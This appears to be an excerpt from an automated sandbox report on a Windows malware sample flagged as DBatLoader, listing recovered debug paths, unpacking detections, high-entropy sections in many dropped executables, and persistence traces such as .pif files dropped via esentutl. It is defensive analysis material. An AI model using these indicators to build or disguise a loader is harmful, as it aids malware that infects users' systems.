                Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: wdmvmswJ.pif, 0000000C.00000003.1596957974.0000000023410000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 00000010.00000003.2983872074.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: snmptrap.pdb source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: AppVShNotify.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msiexec.pdb source: wdmvmswJ.pif, 0000000C.00000003.1706447973.0000000024370000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 00000010.00000003.2983037268.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 00000010.00000003.2984642643.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: _.pdb source: wdmvmswJ.pif, 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 00000010.00000003.2987067217.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1555508277.0000000002932000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B3F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B10000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478142210.0000000002931000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: WmiApSrv.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: Acrobat_SL.pdb((( source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: locator.pdb source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 00000010.00000003.2980211327.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 00000010.00000003.2977864019.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: mavinject32.pdb source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: 64BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2227816265.000000001E790000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: snmptrap.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msdtcexe.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PerceptionSimulationService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: wdmvmswJ.pif, 0000000C.00000003.2209705208.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 00000010.00000003.2985347717.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 00000010.00000003.2987868731.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 00000010.00000003.2981785083.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 00000010.00000003.2983037268.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: maintenanceservice.pdb` source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: WmiApSrv.pdb source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 00000010.00000003.2980968904.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 00000010.00000003.2984642643.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 00000010.00000003.2987067217.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: ALG.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: locator.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 00000010.00000003.2981785083.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 00000010.00000003.2980968904.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: AppVShNotify.pdb source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifUnpacked PE file: 30.2.wdmvmswJ.pif.400000.3.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:EW;
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifUnpacked PE file: 38.2.wdmvmswJ.pif.400000.5.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:EW;
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifUnpacked PE file: 30.2.wdmvmswJ.pif.400000.3.unpack
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifUnpacked PE file: 38.2.wdmvmswJ.pif.400000.5.unpack
                Yara detected DBatLoader
                Source: Yara matchFile source: 4.2.x.exe.2af0000.0.unpack, type: UNPACKEDPE
                Source: wdmvmswJ.pif.4.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0894C LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02B0894C
                Source: alpha.pif.8.drStatic PE information: section name: .didat
                Source: Acrobat.exe.12.drStatic PE information: section name: .didat
                Source: setup.exe.12.drStatic PE information: section name: .didat
                Source: setup.exe.12.drStatic PE information: section name: _RDATA
                Source: updater.exe.12.drStatic PE information: section name: .00cfg
                Source: updater.exe.12.drStatic PE information: section name: .voltbl
                Source: updater.exe.12.drStatic PE information: section name: _RDATA
                Source: IntegratedOffice.exe.12.drStatic PE information: section name: .didat
                Source: IntegratedOffice.exe.12.drStatic PE information: section name: _RDATA
                Source: OfficeC2RClient.exe.12.drStatic PE information: section name: .didat
                Source: OfficeC2RClient.exe.12.drStatic PE information: section name: .detourc
                Source: officesvcmgr.exe.12.drStatic PE information: section name: .didat
                Source: chrome_pwa_launcher.exe.12.drStatic PE information: section name: .00cfg
                Source: chrome_pwa_launcher.exe.12.drStatic PE information: section name: .gxfg
                Source: chrome_pwa_launcher.exe.12.drStatic PE information: section name: .retplne
                Source: chrome_pwa_launcher.exe.12.drStatic PE information: section name: LZMADEC
                Source: chrome_pwa_launcher.exe.12.drStatic PE information: section name: _RDATA
                Source: chrome_pwa_launcher.exe.12.drStatic PE information: section name: malloc_h
                Source: chrmstp.exe.12.drStatic PE information: section name: .00cfg
                Source: chrmstp.exe.12.drStatic PE information: section name: .gxfg
                Source: chrmstp.exe.12.drStatic PE information: section name: .retplne
                Source: chrmstp.exe.12.drStatic PE information: section name: CPADinfo
                Source: chrmstp.exe.12.drStatic PE information: section name: LZMADEC
                Source: chrmstp.exe.12.drStatic PE information: section name: _RDATA
                Source: chrmstp.exe.12.drStatic PE information: section name: malloc_h
                Source: setup.exe0.12.drStatic PE information: section name: .00cfg
                Source: setup.exe0.12.drStatic PE information: section name: .gxfg
                Source: setup.exe0.12.drStatic PE information: section name: .retplne
                Source: setup.exe0.12.drStatic PE information: section name: CPADinfo
                Source: setup.exe0.12.drStatic PE information: section name: LZMADEC
                Source: setup.exe0.12.drStatic PE information: section name: _RDATA
                Source: setup.exe0.12.drStatic PE information: section name: malloc_h
                Source: armsvc.exe.12.drStatic PE information: section name: .didat
                Source: alg.exe.12.drStatic PE information: section name: .didat
                Source: GoogleCrashHandler64.exe.12.drStatic PE information: section name: _RDATA
                Source: GoogleCrashHandler64.exe.12.drStatic PE information: section name: .gxfg
                Source: GoogleCrashHandler64.exe.12.drStatic PE information: section name: .gehcont
                Source: FXSSVC.exe.12.drStatic PE information: section name: .didat
                Source: elevation_service.exe.12.drStatic PE information: section name: .00cfg
                Source: elevation_service.exe.12.drStatic PE information: section name: .gxfg
                Source: elevation_service.exe.12.drStatic PE information: section name: .retplne
                Source: elevation_service.exe.12.drStatic PE information: section name: _RDATA
                Source: elevation_service.exe.12.drStatic PE information: section name: malloc_h
                Source: elevation_service.exe0.12.drStatic PE information: section name: .00cfg
                Source: elevation_service.exe0.12.drStatic PE information: section name: .gxfg
                Source: elevation_service.exe0.12.drStatic PE information: section name: .retplne
                Source: elevation_service.exe0.12.drStatic PE information: section name: _RDATA
                Source: elevation_service.exe0.12.drStatic PE information: section name: malloc_h
                Source: maintenanceservice.exe.12.drStatic PE information: section name: .00cfg
                Source: maintenanceservice.exe.12.drStatic PE information: section name: .voltbl
                Source: maintenanceservice.exe.12.drStatic PE information: section name: _RDATA
                Source: GoogleUpdateComRegisterShell64.exe.12.drStatic PE information: section name: _RDATA
                Source: GoogleUpdateComRegisterShell64.exe.12.drStatic PE information: section name: .gxfg
                Source: GoogleUpdateComRegisterShell64.exe.12.drStatic PE information: section name: .gehcont
                Source: 117.0.5938.132_chrome_installer.exe.12.drStatic PE information: section name: .00cfg
                Source: 117.0.5938.132_chrome_installer.exe.12.drStatic PE information: section name: .retplne
                Source: msdtc.exe.12.drStatic PE information: section name: .didat
                Source: msiexec.exe.12.drStatic PE information: section name: .didat
                Source: MsSense.exe.12.drStatic PE information: section name: .didat
                Source: Spectrum.exe.12.drStatic PE information: section name: .didat
                Source: TieringEngineService.exe.12.drStatic PE information: section name: .didat
                Source: unpack200.exe.12.drStatic PE information: section name: .00cfg
                Source: ie_to_edge_stub.exe.12.drStatic PE information: section name: .00cfg
                Source: ie_to_edge_stub.exe.12.drStatic PE information: section name: .gxfg
                Source: ie_to_edge_stub.exe.12.drStatic PE information: section name: .retplne
                Source: ie_to_edge_stub.exe.12.drStatic PE information: section name: _RDATA
                Source: cookie_exporter.exe.12.drStatic PE information: section name: .00cfg
                Source: cookie_exporter.exe.12.drStatic PE information: section name: .gxfg
                Source: cookie_exporter.exe.12.drStatic PE information: section name: .retplne
                Source: cookie_exporter.exe.12.drStatic PE information: section name: _RDATA
                Source: identity_helper.exe.12.drStatic PE information: section name: .00cfg
                Source: identity_helper.exe.12.drStatic PE information: section name: .gxfg
                Source: identity_helper.exe.12.drStatic PE information: section name: .retplne
                Source: identity_helper.exe.12.drStatic PE information: section name: _RDATA
                Source: identity_helper.exe.12.drStatic PE information: section name: malloc_h
                Source: setup.exe1.12.drStatic PE information: section name: .00cfg
                Source: setup.exe1.12.drStatic PE information: section name: .gxfg
                Source: setup.exe1.12.drStatic PE information: section name: .retplne
                Source: setup.exe1.12.drStatic PE information: section name: LZMADEC
                Source: setup.exe1.12.drStatic PE information: section name: _RDATA
                Source: setup.exe1.12.drStatic PE information: section name: malloc_h
                Source: msedgewebview2.exe.12.drStatic PE information: section name: .00cfg
                Source: msedgewebview2.exe.12.drStatic PE information: section name: .gxfg
                Source: msedgewebview2.exe.12.drStatic PE information: section name: .retplne
                Source: msedgewebview2.exe.12.drStatic PE information: section name: CPADinfo
                Source: msedgewebview2.exe.12.drStatic PE information: section name: LZMADEC
                Source: msedgewebview2.exe.12.drStatic PE information: section name: _RDATA
                Source: msedgewebview2.exe.12.drStatic PE information: section name: malloc_h
                Source: vds.exe.12.drStatic PE information: section name: .didat
                Source: VSSVC.exe.12.drStatic PE information: section name: .didat
                Source: WmiApSrv.exe.12.drStatic PE information: section name: .didat
                Source: wmpnetwk.exe.12.drStatic PE information: section name: .didat
                Source: SearchIndexer.exe.12.drStatic PE information: section name: .didat
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B1D2FC push 02B1D367h; ret 4_2_02B1D35F
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AF63AE push 02AF640Bh; ret 4_2_02AF6403
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AF63B0 push 02AF640Bh; ret 4_2_02AF6403
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AF332C push eax; ret 4_2_02AF3368
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B1C378 push 02B1C56Eh; ret 4_2_02B1C566
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AFC349 push 8B02AFC1h; ret 4_2_02AFC34E
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B1D0AC push 02B1D125h; ret 4_2_02B1D11D
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0306B push 02B030B9h; ret 4_2_02B030B1
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0306C push 02B030B9h; ret 4_2_02B030B1
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B1D1F8 push 02B1D288h; ret 4_2_02B1D280
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0F108 push ecx; mov dword ptr [esp], edx4_2_02B0F10D
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B1D144 push 02B1D1ECh; ret 4_2_02B1D1E4
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AF6784 push 02AF67C6h; ret 4_2_02AF67BE
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AF6782 push 02AF67C6h; ret 4_2_02AF67BE
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AFD5A0 push 02AFD5CCh; ret 4_2_02AFD5C4
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B1C570 push 02B1C56Eh; ret 4_2_02B1C566
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AFC56C push ecx; mov dword ptr [esp], edx4_2_02AFC571
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0AAE0 push 02B0AB18h; ret 4_2_02B0AB10
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B08AD8 push 02B08B10h; ret 4_2_02B08B08
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0AADF push 02B0AB18h; ret 4_2_02B0AB10
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B64A50 push eax; ret 4_2_02B64B20
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AFCBEC push 02AFCD72h; ret 4_2_02AFCD6A
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0886C push 02B088AEh; ret 4_2_02B088A6
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AFC98E push 02AFCD72h; ret 4_2_02AFCD6A
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AFC9DE push 02AFCD72h; ret 4_2_02AFCD6A
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0790C push 02B07989h; ret 4_2_02B07981
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B06946 push 02B069F3h; ret 4_2_02B069EB
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B06948 push 02B069F3h; ret 4_2_02B069EB
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B05E7C push ecx; mov dword ptr [esp], edx4_2_02B05E7E
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B02F60 push 02B02FD6h; ret 4_2_02B02FCE
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_0041C40C push cs; iretd 12_1_0041C4E2
                Source: Acrobat.exe.12.drStatic PE information: section name: .reloc entropy: 7.857629901541196
                Source: setup.exe.12.drStatic PE information: section name: .rsrc entropy: 7.644733541214545
                Source: Aut2exe.exe.12.drStatic PE information: section name: .rsrc entropy: 7.800655098270515
                Source: Aut2exe_x64.exe.12.drStatic PE information: section name: .rsrc entropy: 7.800507924806883
                Source: AutoIt3_x64.exe.12.drStatic PE information: section name: .reloc entropy: 7.943934980231315
                Source: appvcleaner.exe.12.drStatic PE information: section name: .reloc entropy: 7.935643965778136
                Source: SciTE.exe.12.drStatic PE information: section name: .reloc entropy: 7.9123163296469805
                Source: IntegratedOffice.exe.12.drStatic PE information: section name: .reloc entropy: 7.926768905035472
                Source: OfficeC2RClient.exe.12.drStatic PE information: section name: .reloc entropy: 7.716531028347558
                Source: officesvcmgr.exe.12.drStatic PE information: section name: .reloc entropy: 7.937221399929087
                Source: chrome_pwa_launcher.exe.12.drStatic PE information: section name: .reloc entropy: 7.940586616723075
                Source: chrmstp.exe.12.drStatic PE information: section name: .reloc entropy: 7.941023886348422
                Source: setup.exe0.12.drStatic PE information: section name: .reloc entropy: 7.941032370435357
                Source: AppVClient.exe.12.drStatic PE information: section name: .reloc entropy: 7.936523067479569
                Source: jucheck.exe.12.drStatic PE information: section name: .reloc entropy: 7.931078087310504
                Source: jusched.exe.12.drStatic PE information: section name: .reloc entropy: 7.936052797736743
                Source: FXSSVC.exe.12.drStatic PE information: section name: .reloc entropy: 7.942279833740998
                Source: elevation_service.exe.12.drStatic PE information: section name: .reloc entropy: 7.943952204055294
                Source: elevation_service.exe0.12.drStatic PE information: section name: .reloc entropy: 7.945964485826929
                Source: 117.0.5938.132_chrome_installer.exe.12.drStatic PE information: section name: .reloc entropy: 7.93477484000238
                Source: SensorDataService.exe.12.drStatic PE information: section name: .reloc entropy: 7.935383609926094
                Source: Spectrum.exe.12.drStatic PE information: section name: .reloc entropy: 7.945453569107587
                Source: identity_helper.exe.12.drStatic PE information: section name: .reloc entropy: 7.940737618189385
                Source: setup.exe1.12.drStatic PE information: section name: .reloc entropy: 7.944730680089531
                Source: msedgewebview2.exe.12.drStatic PE information: section name: .reloc entropy: 7.93656284710181
                Source: AgentService.exe.12.drStatic PE information: section name: .reloc entropy: 7.937129466044474
                Source: vds.exe.12.drStatic PE information: section name: .reloc entropy: 7.94107270673957
                Source: VSSVC.exe.12.drStatic PE information: section name: .reloc entropy: 7.93954260709988
                Source: wbengine.exe.12.drStatic PE information: section name: .reloc entropy: 7.941290670440269
                Source: wmpnetwk.exe.12.drStatic PE information: section name: .reloc entropy: 7.946616363744485
                Source: SearchIndexer.exe.12.drStatic PE information: section name: .reloc entropy: 7.945863668494267

                Persistence and Installation Behavior

                barindex
                Creates files in the system32 config directory
                Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\b2310dff430b0ac5.bin
                Drops PE files with a suspicious file extension
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
